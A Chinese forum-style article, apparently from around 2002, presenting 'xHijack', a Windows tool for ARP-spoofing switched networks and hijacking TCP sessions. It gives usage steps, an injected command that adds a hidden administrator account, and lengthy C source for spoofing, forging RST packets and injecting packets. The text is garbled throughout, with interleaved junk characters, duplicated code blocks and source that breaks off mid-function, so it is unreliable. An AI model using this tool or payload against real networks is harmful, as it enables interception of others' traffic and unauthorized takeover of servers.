再谈交换环境下的会话劫持(For windows2000)

韩冰

第一步是开启IP Routing的功能，修改注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter为0x1，重启系统即可。
第二步是ARP欺骗，具体原理我就不说了。
第三步就是开始劫持啦。
2 C/ n/ _* [3 d( S/ ?' A: e6 X- `
1 x- d) D+ Y- j* g我写了个程序xHijack可以实现第二、三步功能，使用如下:

Usage: xHijack ServerSide ClientSide
% V1 e; K( h# @# ~
* t6 k& t* |0 Q4 p5 o下面根据三种不同的情况分别说明如何输入参数：
6 a# Y% b5 x3 m- t% t<1>服务器、客户端、劫持者处于同一局域网，接在同一交换机上（或交换机级连？）。
4 H; ]" s6 D- _9 a; W假如服务器的IP是192.168.0.2，客户端的IP是192.168.0.3，提供如下参数给xHijack即可
c:\>xHijack 192.168.0.2 192.168.0.3
* B' r- a. H& w- S劫持前数据流程：server <--> client
劫持后数据流程：server <--> hijacker <--> client

<2>服务器、劫持者处于同一局域网，客户端处于别的网络。
假如服务器IP是202.202.202.2，服务器的网关是202.202.202.1，提供如下参数
+ O& n& v. S9 ^$ Z- Y9 G. hxHijack 202.202.202.2 202.202.202.1
劫持前数据流程：server <--> gw <--> routes <--> client
劫持后数据流程：server <--> hijacker <--> gw <--> routes <--> client
' i( a$ ]2 z, ~; O# J+ Q  j' N
8 X( H8 I4 n) E) t( R7 q. t<3>客户端、劫持者处于同一局域网，服务器处于别的网络。
假如客户端的IP是192.168.0.2，网关是192.168.0.1，提供如下参数
$ j$ Z- W  b  v; A3 _: kxHijack 192.168.0.1 192.168.0.2
! C, K8 u7 X2 Q9 |& X劫持前数据流程：client <--> gw <--> routes <--> server
劫持后数据流程：client <--> hijacker <--> gw <--> routes <--> server

/ _$ ?6 A( q8 t0 E9 l) H" f# s输入两个参数后，会提示你选择网卡，然后会提示
9 U: U# v2 U- d+ r- cl        <-- List all connections
7 Y# t+ i7 }9 ?' pr x       <-- Reset the number x connection
; \2 b$ M2 e, t+ u, c3 }w x       <-- Watch the number x connection
h x command   <-- Hijack the number x connection to execute command
) p. J+ s0 p; o/ {- M7 K. H9 f4 q
list、reset、watch命令我就不解释了。
假如现在有如下连接
(1) 202.202.202.202:23 <--> 192.168.0.3:2345
! ^* Q+ E( X# ]5 v: L我们想要劫持这个连接运行我们的命令，输入
xHijack>h 1 "&net user ey4s hijack /add & net localgroup administrators ey4s /add"
为什么命令前面要加&呢？假如客户刚发送一个字符p过去，我们不加&的话，服务器端接受到的就是
7 `* J7 o/ P" l2 s* T" Ipnet user.....了，加了&后就成为p&net user.....，这样就不管前面客户输入了什么，我们的命令
  R) q0 B5 A4 E都能够运行了。以上都假设服务器是windows 2000，unix下加什么字符，我不知道，我是unix白痴，呵呵。

劫持的流程如下：
% ?3 p8 R, t4 o  b" u<1>伪装成Server给Client发一个rst包
9 C+ ?2 Q7 L% n! R7 Y, Q/ v<2>伪装成Client给Server发了一个数据包
8 f+ [; p& q+ d' ?5 d<3>Server回一个ACK包给client
<4>因为Cleint的连接已经给我们reset掉了，所以client回一个rst包给server
7 T( D1 V5 `7 ?- \6 V) t
这样的话，我们只能发一个伪造的包，但我想已经足够了。
想要一直劫持那个连接也可以，如下
" z; \" t% j& ?" q  T* M2 ?# |' ^<1>伪装成Server给Client发一个rst包
<2>欺骗Client，告诉它Server的MAC地址AAAAAAAAAAAA
<3>伪装成Client给Server发了一个数据包
<4>Server回一个ACK包给client
1 H( e3 j9 i6 g6 e, G<5>Client回一个rst包给Server，但Server收不到，因为Client发到AAAAAAAAAAAA了，呵呵。
<6>然后Server发给Client的包都由我们来处理，包括给Server回ACK包等等。
# }+ F* K7 F6 K' j% v! }7 e( d8 E4 l
不过这样比较危险，在我们劫持的过程中，Client与Server的通讯始终是断开的。


刚开始看TCP/IP协议，调程序调得头昏脑涨，说明也写的乱七八糟，呵呵，程序代码也可能存在很多问题，
/ g. F% J$ _! {' J5 u4 F还请各位多多指点。
/ |+ R5 l5 d' `+ N8 Y
BTW:我没有空间，编译好的程序没地方放：（
% X5 N4 ~0 K' x  ]& T3 Y
* T' h; o0 V; p: z
8 v& ?7 S+ ?$ y% X: l
参考资料
<>交换环境下的会话劫持http://www.xfocus.net/article_view.php?id=375
: h% k$ H$ ^$ D<>交换网络中的嗅探和ARP欺骗http://www.xfocus.net/article_view.php?id=377
0 Z$ [! m2 {2 {

以下是程序代码
. o- W. L% k- h----------------------------------------------------------------------
5 {% R$ {+ j8 b5 p" y7 Y/*-----------------------------------------------------------------------------
# z' i- P: G- KFile      : xHijack.c
Version      : 1.0
Create at    : 2002/8/12
. e/ I- P6 {6 N: ~. S% KLast modifed at  : 2002/8/19
Author      : eyas
Email      : ey4s@21cn.com
  v& V' G1 s# L( A( mHomePage    : www.ey4s.org
& |- n% f5 b+ F9 D$ X感谢refdom和shotgun发布的源代码，使我获益非浅。
0 P9 u. n8 a% D1 _* b6 G+ z' h2 |If you modify the code, or add more functions, please email me a copy.

备注:
- Y2 A9 L0 F2 B. [1 v. j+ h3 v8 X5 f<>没有考虑IP头、TCP头超过20字节的情况
% v( `1 A/ w* i) G: b! f- T<>没有考虑数据包分片的情况
% f# p4 p- F- t! B<>没有对截取到的TCP数据进行解码，如TELNET，虽然是明文传输，但是TCP数据里面包含了
显示格式、位置等信息，直接打印出来，显得很凌乱。但如果是IRC、SMTP、POP3等就没问
1 U5 Y9 V1 C% J. z2 i题了。
1 s5 A$ ]4 F8 \; v- V% ^* h
, j0 z+ Q) \0 x5 Q% x& |也许下一版本会修正这些问题，也许不会有下一版本了。
1 E  H$ I. g/ {  o6 t
-----------------------------------------------------------------------------*/
#include
#include
#include
/ a6 u! ?# s$ H! {8 @7 q#include
#include
  d! u3 N: ]- S3 }8 l$ X) l#include
+ e+ m, K9 t+ z8 P6 s+ h#include

( q* I; m& L1 p& t4 B# x- p#pragma comment (lib, "packet")
#pragma comment (lib, "iphlpapi")
: Q. R' \  m5 }. p' x+ X#pragma comment (lib, "ws2_32")

8 U1 S8 r1 d; x, ?0 v, G7 E#define Max_Num_Adapter 10
#define Max_Num_IPAddr  5
9 q$ i0 ~+ i, a) v" }# U3 M0 C( D#define EPT_IP      0x0800      /* type: IP  */
#define ARP_HARDWARE  0x0001      /* Dummy type for 802.3 frames */
  w+ H1 c0 V: ~- r$ y2 `2 f#define EPT_ARP      0x0806      /* type: ARP */

#define  ACTION_NONE    0
! l+ r' j/ ]" w" B3 J3 X  v#define  ACTION_WATCH  1
0 x  l6 t: w/ F3 m3 r/ v#define  ACTION_RESET  2
* v' h" g7 @# V  ^& v: }( D#define ACTION_HIJACK  3

6 Q5 t5 h+ p! J. X( E/ ]/*以1字节对齐*/
#pragma pack(1)
5 t8 O% v# C9 C. C9 Qtypedef struct _ehhdr
{
  unsigned char  DestMAC[6];
  unsigned char  SourceMAC[6];
  unsigned short  EthernetType;
}EHHDR, *PEHHDR;

6 Y6 S4 [. G0 B  j( a& ]% ntypedef struct _iphdr        //定义IP首部
{
; I/ l6 x5 j, M. P1 z; M  unsigned char h_verlen;      //4位首部长度,4位IP版本号
  unsigned char tos;        //8位服务类型TOS
6 }, L, @" k0 @( o2 c& x0 t* w% c: B  unsigned short total_len;    //16位总长度（字节）
  unsigned short ident;      //16位标识
: `1 q4 v% U/ f. ~& H* Z  unsigned short frag_and_flags;  //3位标志位
" l5 q; ]2 ?0 Y' Z8 N. u$ Q  unsigned char ttl;        //8位生存时间 TTL
5 ~. \( i  V+ Y1 m( r6 b, W" q  unsigned char proto;      //8位协议 (TCP, UDP 或其他)
  unsigned short checksum;    //16位IP首部校验和
  unsigned int sourceIP;      //32位源IP地址
* J3 z; o- r$ o6 j2 `" j4 z  unsigned int destIP;      //32位目的IP地址
}IPHDR, *PIPHDR;
$ l( `# T7 v) g( P% M- e
typedef struct _tcphdr        //定义TCP首部
{
  USHORT th_sport;        //16位源端口
  USHORT th_dport;        //16位目的端口
1 `$ a% s, w" [  _  unsigned int th_seq;      //32位序列号
4 s! S- m" F0 }; u5 \  unsigned int th_ack;      //32位确认号
* y& N$ Y0 W' q4 N' i; O  unsigned char th_lenres;    //4位首部长度/6位保留字
  unsigned char th_flag;      //6位标志位
* i5 `  [$ w  T) h. T8 H/ ]6 g  USHORT th_win;          //16位窗口大小
9 ]5 B6 v/ p1 b: v  USHORT th_sum;          //16位校验和
  USHORT th_urp;          //16位紧急数据偏移量
, h1 ~/ c; M' B}TCPHDR, *PTCPHDR;
- @6 z- M. Z, a
typedef struct _psdhdr        //定义TCP pseudo header
9 S! z2 a/ ~$ H, `; `$ x& y' R{               
  unsigned long saddr;
) H2 u' M" K  k7 I- r3 E  unsigned long daddr;
  char mbz;
  char ptcl;
: C, x8 ~! x6 v* H& u0 m2 m  unsigned short tcpl;
}PSDHDR, *PPSDHDR;
" {2 N/ q# s; `7 v; r5 }
, j# [+ P* \8 l5 \( b0 @" }' Etypedef struct _arphdr
" D# \# _+ W3 d{
  unsigned short  HrdType;//硬件类型
, d9 J6 q% O) w5 I' t  unsigned short  ProType;//协议类型
  unsigned char  HrdAddrlen;//硬件地址长度
# A: X  X& _0 Z0 Z+ z6 T  unsigned char  ProAddrLen;//协议地址长度
0 \% ?) \  `6 V- F7 ?  unsigned short  op;//operation
  unsigned char  SourceMAC[6];/* sender hardware address */
! |0 N3 n$ k7 I8 a+ Q7 t) T  unsigned long  SourceIP;/* sender protocol address */
4 F  d" B# K" I- F+ P( C9 v  unsigned char  DestMAC[6];/* target hardware address */
' f7 r+ O% F( c! S+ a  unsigned long  DestIP;/* target protocol address */
}ARPHDR, *PARPHDR;

2 |! E" W; S2 {3 ltypedef struct _ArpPacket
! h* ~. z2 _2 U. z2 G& p{
  EHHDR  ehhdr;
& q. A& R& ~' r! r& [7 r* C  ARPHDR  arphdr;
}ARPPACKET, *PARPPACKET;
  z+ G0 o& N, E  [' S
2 `2 \6 t" O; |+ k* \' F8 Xtypedef struct _tcppacket
{
  EHHDR  ehhdr;
6 y0 L0 T9 T/ l8 R  IPHDR  iphdr;
7 O* o/ P& l2 G( y9 W$ a1 q  TCPHDR  tcphdr;
& H1 H7 U' u+ D7 J}TCPPACKET, *PTCPPACKET;

6 o9 l5 V5 B# R0 P. e- Htypedef struct _conninfo
{
  DWORD  dwServerIP;
  USHORT  uServerPort;
  DWORD  dwClientIP;
  USHORT  uClientPort;
  DWORD  ident;//标识
  BOOL  bActive;
  struct  _conninfo  *Next;
}CONNINFO, *PCONNINFO;

//定义全局变量

韩冰

unsigned int  g_ServerSideIP,
        g_ClientSideIP,
: A. ~( c# J* ~/ A% s        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
        g_TotalIP = 0;//
unsigned char  g_szOwnMAC[6];//本机MAC地址
unsigned char  g_szClientSideMAC[6];
/ M$ {9 E# f& [1 K' ]unsigned char  g_szServerSideMAC[6];
5 F3 P0 q6 _: h6 D! e9 F1 p' C) |5 Qchar      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
LPADAPTER    g_lpAdapter;
* n. E4 k  Y( g0 q% d( p//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
HANDLE      g_hThread[4];
char      g_szCommand[128];//command to execute after hijack
2 F7 D$ x7 I6 n  TDWORD      g_dwAction;//action type
DWORD      g_dwCtrlConn;//action 所控制连接的标识
7 W7 u/ _; q/ m; pDWORD      g_ident;//节点标识，递增
' d* G# ]& N9 ^' PPCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
        g_pConnHead = NULL,
        g_pConnLast = NULL;
( _$ c  D, _3 X. A' Bchar      g_szSendPacketBuf[1514];
* s+ {" S! I. p5 Z! W. I9 }( r) xLPPACKET    g_lpSendPacket;
# m; ?$ g- H3 C% F//函数
0 _+ c" D& T1 Z. U* ?+ |( Mvoid      usage(void);
void      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
void      ListAllConnection();//列出当前所有的连接
5 f4 s+ e8 A1 l$ S6 W2 W" Ivoid      ResetActionAllFlag();
USHORT      checksum(USHORT *, int);
BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
4 w' U: X/ I0 E1 KBOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
9 C' @0 I! E2 `LPADAPTER    InitAdapter();//初始化一些参数和全局变量
: J* e1 r; Z4 S5 e. I( [" qBOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
% U+ K& t" p4 Z& W$ cBOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
DWORD      GetConnNum(char *, DWORD, DWORD *);
- {# @) o1 a% O9 s# p7 y, CDWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
# S1 b$ L+ P2 T  p- F3 \( BDWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
" ]5 V  I9 ], I" @5 gDWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
DWORD  WINAPI  InterfaceThread(LPVOID);//
BOOL  WINAPI  CtrlEvent(DWORD);
* r5 ]+ L/ X$ V1 p0 P4 T# f% q+ a3 k


int main(int argc, char **argv)
{
  struct    bpf_stat stat;
- J1 x4 `# c1 h$ A  int      i;

' I# L, c( g4 U$ ]) b5 h! R  usage();
* R; }0 D) R# z2 `5 Z, d: ?! E7 K  if (argc != 3) return 0;
+ |- a3 F1 V0 P- t6 [  //取得参数
  g_ServerSideIP = inet_addr(argv[1]);
  g_ClientSideIP = inet_addr(argv[2]);
  //初始化adapter & 一些全局变量
7 U1 L9 i7 {( V/ c  g_lpAdapter = InitAdapter();
; t) q, B. b. q9 A+ B, T# R  if(!g_lpAdapter) return 0;
( k" [2 i" A4 e2 @, {  //get ServerSide MAC & ClientSide MAC
3 |! s0 @, K) b1 m) I; v  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
  //create arp spoof thread     
& a0 Z" [2 r: q. c5 a: X  i = 1;
# W' @% @4 j1 O7 L( o  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
" |+ W' w0 d4 b0 N5 W; T  Sleep(500);
  i = 2;
3 v4 T1 ], Z9 @! Z  `- O# A  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
4 z  g! k3 U, o! y/ y+ T. X  //create analyse packet thread
* x  \- ]+ ^% d8 X  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
0 s  v8 O& ]* o) A  //create interface thread
  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
  //set console ctrl handle
$ W7 U- C6 v4 W2 w. p  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
; G8 B9 [4 `+ X3 w7 `# A: d& }  {
    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
" x  K; t8 n7 A0 D) g' V; Y$ }    return 0;
  }
) \. g5 l) K' E! n: h4 L* ^1 V" `  //wait for any thread exit
/ R, n* K" _4 v* k! ]  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
  //print the capture statistics
  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
* Z" n/ Q6 d% d* Y% v4 ^    printf("Warning: unable to get stats from the kernel!\n");
  else
    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
' @2 \8 ^+ z6 ]& V4 y% w1 U- m+ M! U  //free resource   
  PacketFreePacket(g_lpSendPacket);
. ^  y" W# d. y# T7 R/ c8 L  PacketCloseAdapter(g_lpAdapter);
4 B. K  C" l- `8 I0 O  return 0;
}
1 D9 d& U' p& F  B. y& s
//
( E$ v  R; D' f//功能：重置所有于ACTION有关的标志
//

韩冰

unsigned int  g_ServerSideIP,
: W# N. r# E: f  |, e% X) Y        g_ClientSideIP,
        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
% A3 f* Y3 r$ |% L        g_TotalIP = 0;//
unsigned char  g_szOwnMAC[6];//本机MAC地址
, w1 O3 k9 z' k9 x% Qunsigned char  g_szClientSideMAC[6];
2 r9 u4 M% X3 K4 z' Tunsigned char  g_szServerSideMAC[6];
char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
% K% Z8 w9 s' w8 y* m/ v5 }# QLPADAPTER    g_lpAdapter;
//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
HANDLE      g_hThread[4];
char      g_szCommand[128];//command to execute after hijack
7 Z2 T$ M+ o$ G6 p8 {DWORD      g_dwAction;//action type
6 w, f) R6 x5 ?, A. a# ZDWORD      g_dwCtrlConn;//action 所控制连接的标识
; Q# u/ S; |# f1 P6 r$ C1 bDWORD      g_ident;//节点标识，递增
PCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
& F# b; h: L% x, V7 Y& A        g_pConnHead = NULL,
        g_pConnLast = NULL;
( L$ x- \( U5 Vchar      g_szSendPacketBuf[1514];
LPPACKET    g_lpSendPacket;
6 p8 D! n( m8 `8 m/ y$ i. `//函数
5 `( R# `7 k% J" _$ Cvoid      usage(void);
# |5 c# h# M6 M  H1 P% i; a, Svoid      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
void      ListAllConnection();//列出当前所有的连接
void      ResetActionAllFlag();
5 k8 E  r9 i, r' |. M0 ^0 [% fUSHORT      checksum(USHORT *, int);
& v! F! V! K) q0 PBOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
$ K* |4 F& V! r8 U: oBOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
1 v9 D- i- H- P, vLPADAPTER    InitAdapter();//初始化一些参数和全局变量
BOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
BOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
DWORD      GetConnNum(char *, DWORD, DWORD *);
9 y2 B* J8 c, Q4 C8 QDWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
' [* U( ?% N" EDWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
& g& |3 F8 B# V- y$ VDWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
DWORD  WINAPI  InterfaceThread(LPVOID);//
BOOL  WINAPI  CtrlEvent(DWORD);
" o: C  F: r7 t9 B2 g
' [. Y+ a9 k' H9 m- M. _. b

int main(int argc, char **argv)
& r% f' B9 N+ I) [; m- i{
  struct    bpf_stat stat;
1 B* l+ F+ h- f8 w  int      i;
; C6 k, C4 v% j$ Z) k
  usage();
  if (argc != 3) return 0;
  //取得参数
7 A0 x4 }  O7 D  g_ServerSideIP = inet_addr(argv[1]);
8 f0 u" M- y2 X0 e5 ]1 A) F  u. o% O  g_ClientSideIP = inet_addr(argv[2]);
7 Q2 p3 W$ K! |  //初始化adapter & 一些全局变量
  g_lpAdapter = InitAdapter();
! m+ S$ }! H, m  o/ O7 m, j  if(!g_lpAdapter) return 0;
  //get ServerSide MAC & ClientSide MAC
$ @: c5 }+ T1 Q9 g  S( y& ]/ e  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
& P3 x, e" w$ n6 [  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
  //create arp spoof thread     
  i = 1;
  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  Sleep(500);
  i = 2;
0 W1 ]" g$ k  k  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  //create analyse packet thread
  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
  //create interface thread
  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
  //set console ctrl handle
2 B8 W* @+ D0 W2 \8 a" p  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
6 i& X' w9 x+ M$ T; T  {
    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
    return 0;
  }
  //wait for any thread exit
  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
  //print the capture statistics
  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
( w& \- i1 n/ i1 i: ]    printf("Warning: unable to get stats from the kernel!\n");
  else
    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
9 l6 m* e* u( h, y+ a5 @. R( {  //free resource   
  PacketFreePacket(g_lpSendPacket);
  PacketCloseAdapter(g_lpAdapter);
- p: l( I( h5 g) K: B- a3 S  return 0;
}

//
//功能：重置所有于ACTION有关的标志
; h! ?! p& l8 m4 b//

韩冰

void ResetActionAllFlag()
{
  g_dwCtrlConn = 0;
0 y$ u# d! o2 f8 t8 E* G) L  g_pCurrCtrlConn = NULL;
& d+ F, a" y) }4 }% X6 v" n( K  g_dwAction = ACTION_NONE;
}

//
//功能：处理Ctrl+C和Ctrl+Break事件
//
, L( i; L# z% q% P) jBOOL WINAPI CtrlEvent(DWORD dwCtrlType)
& A7 Z! l2 a8 u% X! J% ]{
, f, y% }- ]  K* D- H& h( n6 m$ t  switch(dwCtrlType)
  {
    case CTRL_BREAK_EVENT:
      //reset action all flag
% [. O; `; @/ h% i! e      ResetActionAllFlag();
( ~2 H1 A8 i) I$ d4 x, C      break;
& E+ Z+ ?* b: x# H3 {) T. z9 k4 V    case CTRL_C_EVENT:
9 S5 m" o0 a! T$ N! x      //terminate all thread
      TerminateThread(g_hThread[0], 0);
      TerminateThread(g_hThread[1], 0);
      TerminateThread(g_hThread[2], 0);
      TerminateThread(g_hThread[3], 0);
, d+ ]* k* S; i8 _# @      break;
0 M( `9 `9 S9 w2 R6 |7 \    default:
* d% M( O  O: |2 h7 s/ Q5 }      break;
* i7 \# x* T8 S* n0 }- V$ `( r  }
7 ]6 M/ m8 U. W" X  return TRUE;
4 ^2 \8 j' w$ @}
) `# G6 }: r% b
2 W7 z# P5 ~% b$ q  V; a' O//
//功能：处理用户输入
//
; \) ?& M5 {' I% v0 y6 }! M: r. p1 N; HDWORD GetConnNum(char *szStr, DWORD dwLen, DWORD *lpCommandPos)
{
  DWORD  i;
  char  szBuff[16];

  *lpCommandPos = 0;
  for(i=0; i<15, i代码比较乱
//
DWORD WINAPI InterfaceThread(LPVOID lp)
% y6 W0 H" C- C6 \3 s. D, e{
: {7 w) q5 a, _+ A* O% p$ V: T  char  szHelp[] =  "l\t\t<-- List all connections\n"
# R/ y1 [% s, n! L9 `            "r x\t\t<-- Reset the number x connection\n"
            "w x\t\t<-- Watch the number x connection\n"
- X9 t- w2 J& M            "h x command\t<-- Hijack the number x connection to execute command\n"
            "[Note]\n"
            "Ctrl+Break to clear all action\n"
- y3 @, Q0 x- c/ |) c            "Ctrl+C to exit\n";
; K$ K, V: y. ?1 M4 d# _# y  char  szPrompt[] = "\nxHijack>";
( E* k& F# m: w/ F3 x4 I  char  szBuffer[128];
  DWORD  dwPos;
+ p4 }' E$ j4 `& B  PCONNINFO  pTmp;
, ]; x, |2 O7 U  ?& T  M
& R7 `4 d5 h6 ?% G; D% \  while(1)
1 n% o5 d& @/ p( M, Q+ b/ o. K+ i  {
    gets(szBuffer);//不考虑buffer overflow
* ?: A- O$ {- O; h1 |    switch(szBuffer[0])
    {
3 [; Y/ c, o3 x, @! s. r+ G      case 'l':
0 n# E4 m/ G$ J4 q1 a+ U  X& B; y& L      case 'L':
0 `+ n8 ~! L8 z  o7 Z- }/ S( ?: d        ListAllConnection();
7 c9 a3 K/ K6 v% P5 n        break;
3 F* I2 f3 Z% O' Y8 P      case 'r':
      case 'R':
        if(strlen(szBuffer) >2)
$ V- u1 }) O% ^6 P        {
# m0 H. @6 ]' n          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
* ^2 G- m8 m9 ~          g_dwAction = ACTION_RESET;
8 n8 Z5 \  m4 z- j& ^; k3 o        }
1 f6 @: }/ u/ B/ y3 K9 N        else printf("%s", szHelp);
        break;
      case 'w':
      case 'W':
) m8 B/ ~' ~" r' e+ P/ y        if(strlen(szBuffer) > 2)
* a" H/ ~! g# F$ l  m$ ~2 \        {
8 s/ x6 ]# Q9 g          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          g_dwAction = ACTION_WATCH;
        }
        else printf("%s", szHelp);
        break;
      case 'h':
      case 'H'://h 1 xxx
2 G9 U& x# K6 @& ?+ K        if(strlen(szBuffer) > 5)
2 g6 s8 j( W- w$ x/ `* q        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          //如果command第一个字符是'或"
8 @4 d7 B: o( W- K          if( (szBuffer[2+dwPos+1] == '\'') || (szBuffer[2+dwPos+1] == '\"') )
          {
            strncpy(g_szCommand, &szBuffer[2+dwPos+1+1], sizeof(g_szCommand) - 3);
            g_szCommand[strlen(g_szCommand) - 1] = 0x0;//去掉最后一个'或"
          }
          else strncpy(g_szCommand, &szBuffer[2+dwPos+1], sizeof(g_szCommand) - 3);
3 Y8 G9 E9 J( j8 W( w          strcat(g_szCommand, "\x0D\x0A");
& U- B1 f( C5 }- p          g_dwAction = ACTION_HIJACK;
6 W/ o( Q% o! S7 Q9 }4 H5 s2 S        }
) g2 C% H8 _/ P1 ^* @        else printf("%s", szHelp);
! m- b, t! ?" o8 d$ K5 ?        break;
      default:
        printf("%s", szHelp);
& M1 C8 F' X/ v" T& R3 r        break;
2 V+ T$ N8 j  m4 ]; q, V/ e    }//end of switch
    //find the specify ident's struct point
    if( (g_dwCtrlConn) && (g_dwAction) )
' [/ m* l9 o  t% G# u3 B; K    {
" {3 ~9 N5 s- q2 J2 {& H3 }0 v  l      g_pCurrCtrlConn = NULL;
      pTmp = g_pConnHead;
      while(pTmp)
      {
' W  `+ t3 H* v2 Z& U" P        if((pTmp->ident == g_dwCtrlConn) && (pTmp->bActive) )
        {
          g_pCurrCtrlConn = pTmp;
          break;
        }
        pTmp = pTmp->Next;
      }
      if(!g_pCurrCtrlConn)
* r$ z  l8 r* T& ]4 F, v/ d  |      {
        printf("Can't find the number %d connection.\n", g_dwCtrlConn);
( q1 H8 F4 d& @) q1 B        //reset action all flag
: i7 p& m2 S4 Q+ d) O        ResetActionAllFlag();      
: w- b, U  l$ W" Q7 J. W; n      }
    }
    if(!g_dwCtrlConn) ResetActionAllFlag();
    //显示当前用户所期望的动作
    printf("\nCurrentAction:");
    switch(g_dwAction)
1 B$ b1 j# l1 ?5 V  w    {
- ^: M+ u) r: x3 _4 \      case ACTION_WATCH:
        printf("ACTION_WATCH");
        break;
3 S& w  m* I/ `# F      case ACTION_RESET:
        printf("ACTION_RESET");
' R2 ~' H; ]5 t- [) H+ _/ T        break;
9 q" {( L1 ^# N" Y$ m; h; T4 h6 O      case ACTION_HIJACK:
        printf("ACTION_HIJACK");
        break;
      default:
) {& l/ D( w& L5 R& L0 `        printf("ACTION_NONE");
        break;
; d) l- ^' Z# _' B1 e- v    }
    printf("\tCurrentCtrlConn:%d%s", g_dwCtrlConn, szPrompt);
  }//enf of while
  return 0;
}

韩冰

// 5 ~2 G4 [* P, E3 p//功能：列出当前所有连接 - t6 u ^9 ?; x. p3 f9 B) T// void ListAllConnection() { PCONNINFO pTmp; SOCKADDR_IN saDest, saSource; pTmp = g_pConnHead; 6 c6 ]3 O1 c( Z+ L0 ~8 g2 c" o" | while(pTmp) ; z( S4 n. C/ @3 ~! q) a { 8 J% a# P2 U& ]1 h ? if(pTmp->bActive) { saSource.sin_addr.s_addr = pTmp->dwServerIP; # M7 X% x3 k! d9 h: x; p+ q saDest.sin_addr.s_addr = pTmp->dwClientIP; 4 x7 F) X! Z8 ? printf("(%d) %s:%d <--> ", pTmp->ident, inet_ntoa(saSource.sin_addr), # {" ^8 {, _+ z3 J; y ntohs(pTmp->uServerPort)); " n2 e+ B8 B' a- p, j- P. q6 C printf("%s:%d\n", inet_ntoa(saDest.sin_addr), ntohs(pTmp->uClientPort)); } pTmp = pTmp->Next; } , D" j% J6 g' |+ ], x' S} 3 ~% |& i1 \; q# h; ]. e' l! j" _& @// //功能：初始化一些数据，取得指定网卡的MAC地址和所有IP地址 // LPADAPTER InitAdapter() & N Q8 }; T& `8 U! b3 P{ LPADAPTER lpAdapter; static char AdapterList[Max_Num_Adapter][1024]; ( q% S4 u* S. }" A) a4 P char szSelectAdapterName[512]; 7 \' N. ~2 T1 y WCHAR AdapterName[2048]; WCHAR *temp,*temp1; ULONG AdapterLength = 1024; * j0 D0 H* h9 O6 O2 ^# k8 r int iAdapterNum = 0; int iRetCode, i; int iAdapter = 0; * S a$ r; o7 e7 ~& v ULONG ulLen = 0; DWORD dwRet; PIP_ADAPTER_INFO pAdapterInfo = NULL, pTmp; PIP_ADDR_STRING pIPAddr; . M3 A$ v) B4 d) \0 s* e //Get The list of Adapter if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE) 4 o6 n$ W2 Z; A8 D4 {4 @% d$ O# } { : O3 D" t% o$ x; d8 V8 V2 J printf("Unable to retrieve the list of the adapters!\n"); return 0; } temp = temp1 = AdapterName; 7 G( w5 d" r: r }& [ i = 0; while ((*temp != '\0')||(*(temp-1) != '\0')) 2 V/ t3 ] M6 c& q, F- o( d" N { if (*temp == '\0') { 8 J1 W' r# I5 I memcpy(AdapterList,temp1,(temp-temp1)*2); $ ]- h0 U6 s! p7 n" _+ L3 T printf("%d - %S\n", i+1, AdapterList); temp1=temp+1; i++; " h3 e- B# i3 Q, V } ! P2 @( a4 n3 o! b! 